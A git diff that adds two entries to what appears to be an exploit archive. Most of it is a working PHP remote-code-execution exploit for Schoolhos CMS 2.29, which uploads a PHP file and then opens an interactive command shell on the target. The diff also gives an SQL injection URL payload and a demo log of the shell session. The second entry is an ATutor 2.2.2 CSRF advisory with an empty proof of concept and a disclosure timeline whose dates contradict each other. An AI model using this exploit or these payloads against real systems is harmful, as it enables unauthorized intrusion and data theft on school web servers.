diff --git a/files.csv b/files.csv
index a44aa2a73..8bf586700 100755
--- a/files.csv
+++ b/files.csv
@@ -36808,3 +36808,5 @@ id,file,description,date,author,platform,type,port
40749,platforms/php/webapps/40749.txt,"MyBB 1.8.6 - Cross-Site Scripting",2016-11-10,"Curesec Research Team",php,webapps,80
40750,platforms/php/webapps/40750.txt,"4Images 1.7.13 - SQL Injection",2016-11-10,0x4148,php,webapps,0
40751,platforms/php/webapps/40751.txt,"vBulletin 4.2.3 - 'ForumRunner' SQL Injection",2015-08-25,"Manish Tanwar",php,webapps,0
+40753,platforms/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,php,webapps,0
+40755,platforms/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",php,webapps,0
diff --git a/platforms/php/webapps/40753.php b/platforms/php/webapps/40753.php
new file mode 100755
index 000000000..e42662367
--- /dev/null
+++ b/platforms/php/webapps/40753.php
@@ -0,0 +1,165 @@
+\x0d\x0a-----------------------------26518470919255\x0d\x0a\x0d\x0a' \
+ 'http://HOST/PATH/elearningku/proses.php?pilih=guru&untukdi=upload'
+
+ php file can be ccessed via : http://HOST/PATH/file/materi/0x4148.php
+
+II - Unauthenticated sql injection
+
+ File : elearningku/download.php
+ Line 6
+ $file=mysql_query("SELECT * FROM sh_materi WHERE id_materi='$_GET[id]'");
+ $r=mysql_fetch_array($file);
+ $filename=$r[file_materi];
+
+ header("Content-Type: octet/stream");
+ header("Pragma: private");
+ header("Expires: 0");
+ header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
+ header("Cache-Control: private",false);
+ header("Content-Type: $ctype");
+ header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
+ header("Content-Transfer-Encoding: binary");
+ header("Content-Length: ".filesize($dir.$filename));
+ readfile("$dir$filename");
+
+ POC : versi_2.29/elearningku/download.php?id=-1' union select 1,version(),3,4,5,6,7,8-- -
+ DB version will be showed as filename
+
+Script is really full of injection flaws , mentioning all of it is such waste of time
+
+Full exploitation Demo
+~0x4148fo# php scho.php http://192.168.0.50/lab/scho/versi_2.29/
+[*] Schoolhos CMS 2.29 Remote command execution
+[*] Author : Ahmed sultan (0x4148)
+[*] Connect : 0x4148.com | 0x4148@gmail.com
+
+ + Sending payload to http://192.168.0.50/lab/scho/versi_2.29/
+ + Payload sent successfully
+
+0x4148@http://192.168.0.50/lab/scho/versi_2.29/# dir
+ Volume in drive C is OS_Install
+ Volume Serial Number is D60F-0795
+
+ Directory of C:\xampp\htdocs\lab\scho\versi_2.29\file\materi
+
+11/13/2016 02:03 AM .
+11/13/2016 02:03 AM ..
+11/13/2016 02:03 AM 47 0x4148.php
+11/30/2011 06:56 PM 8,522 aku.php
+11/29/2011 02:02 AM 74 Alar Reproduksi.rar
+11/29/2011 02:03 AM 74 albert.rar
+11/29/2011 08:25 PM 12,326 ari.png
+11/29/2011 08:27 PM 12,318 ari.rar
+11/29/2011 06:57 PM 74 cerita.rar
+11/29/2011 08:24 PM 0 contoh.txt
+11/29/2011 02:05 AM 74 dos.rar
+11/29/2011 02:01 AM 74 English1.rar
+12/12/2011 11:13 AM 117 index.html
+11/29/2011 02:10 AM 74 kekebalantubuh.rar
+11/29/2011 02:11 AM 74 masa jenis.rar
+11/29/2011 02:14 AM 74 office.rar
+11/29/2011 02:06 AM 74 paragraf.rar
+11/29/2011 02:04 AM 74 pemanasan.rar
+11/29/2011 02:00 AM 74 polakalimat.rar
+11/29/2011 02:15 AM 74 prepare.rar
+11/29/2011 02:13 AM 74 proklamator.rar
+11/29/2011 02:12 AM 74 sea games.rar
+11/29/2011 02:05 AM 74 soekarno.rar
+11/29/2011 02:09 AM 74 speaking.rar
+11/29/2011 02:15 AM 74 ulangan INDO.rar
+11/29/2011 02:11 AM 74 volume.rar
+ 24 File(s) 34,662 bytes
+ 2 Dir(s) 38,197,485,568 bytes free
+
+0x4148@http://192.168.0.50/lab/scho/versi_2.29/# exit
+
+~0x4148fo#
+
+*/
+$host=$argv[1];
+$target="$host/elearningku/proses.php?pilih=guru&untukdi=upload";
+echo "[*] Schoolhos CMS 2.29 Remote command execution\n";
+echo "[*] Author : Ahmed sultan (0x4148)\n";
+echo "[*] Connect : 0x4148.com | 0x4148@gmail.com\n\n";
+echo " + Sending payload to $host\n";
+fwrite(fopen("0x4148.php","w+"),'');
+$x4148upload = curl_init();
+curl_setopt($x4148upload, CURLOPT_URL, $target);
+curl_setopt($x4148upload, CURLOPT_USERAGENT, "mozilla");
+curl_setopt($x4148upload, CURLOPT_POST, 1);
+curl_setopt($x4148upload, CURLOPT_RETURNTRANSFER, true);
+curl_setopt($x4148upload, CURLOPT_POSTFIELDS,array("fupload"=>"@".realpath("0x4148.php")));
+curl_setopt($x4148upload, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($x4148upload, CURLOPT_SSL_VERIFYHOST, 0);
+$result = curl_exec($x4148upload);
+curl_close($x4148upload);
+$x4148request=curl_init();
+curl_setopt($x4148request,CURLOPT_RETURNTRANSFER,1);
+curl_setopt($x4148request,CURLOPT_URL,$host."/file/materi/0x4148.php");
+curl_setopt($x4148request, CURLOPT_POSTFIELDS,"0x4148=".base64_encode("echo '0x4148fo';"));
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($x4148request,CURLOPT_FOLLOWLOCATION,0);
+curl_setopt($x4148request,CURLOPT_TIMEOUT,20);
+curl_setopt($x4148request, CURLOPT_HEADER, true);
+$outp=curl_exec($x4148request);
+curl_close($x4148request);
+if(!preg_match("#0x4148fo#",$outp)){
+echo " - Failed :(\n";
+die();
+}
+echo " + Payload sent successfully\n\n";
+while(0<1){
+echo "0x4148@$host# ";
+$command=trim(fgets(STDIN));
+if($command=='exit'){
+die();
+}
+$x4148request=curl_init();
+curl_setopt($x4148request,CURLOPT_RETURNTRANSFER,1);
+curl_setopt($x4148request,CURLOPT_URL,$host."/file/materi/0x4148.php");
+curl_setopt($x4148request, CURLOPT_POSTFIELDS,"0x4148=".urlencode(base64_encode("echo '>>>>>';system('$command');echo '>>>>>';")));
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($x4148request,CURLOPT_FOLLOWLOCATION,0);
+curl_setopt($x4148request,CURLOPT_TIMEOUT,20);
+curl_setopt($x4148request, CURLOPT_HEADER, true);
+$outp=curl_exec($x4148request);
+curl_close($x4148request);
+echo explode(">>>>>",$outp)[1]."\n";
+}
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/40755.html b/platforms/php/webapps/40755.html
new file mode 100755
index 000000000..3fa2d5ade
--- /dev/null
+++ b/platforms/php/webapps/40755.html
@@ -0,0 +1,217 @@
+# Exploit Title: ATutor_2.2.2 Learning Management System
+# Cross-Site Request Forgery (Add New Course)
+# Date: 13-11-2016
+# Software Link: https://github.com/atutor/ATutor/releases/tag/atutor_2_2_2
+# Vendor: http://www.atutor.ca/
+# Exploit Author: Saravana Kumar
+# Contact: https://facebook.com/06saravanakumar
+# Category: webapps
+# Version: 2.2.2
+# Platform: PHP
+# Tested on: [Kali Linux 2.0 | Windows 7]
+# Email: 06saravanakumar@gmail.com
+# Affected URL:
+http://localhost/ATutor/mods/_core/courses/users/create_course.php
+
+==================================
+Vulnerability Disclosure Timeline:
==================================
2016-11-07: Found the vulnerability and Reported to Vendor.
2016-11-08: Vendor Replied.
2016-11-10: Vendor Fixed the vulnerability.
2016-11-11: Patch released
2016-10-12: Public Disclosure
+
+########################### CSRF PoC ###############################
+
+
+ <------ CSRF POC ------>
+
+
+
+
+
+
+---------------------------------------------------------------------------
+
+Solution:
+
+Patch is available. Install patch using the ATutor Patcher.
+
+Link to download patch:
+
+http://update.atutor.ca/patch/2_2_2/2_2_2-6/patch.xml
+---------------------------------------------------------------------------
+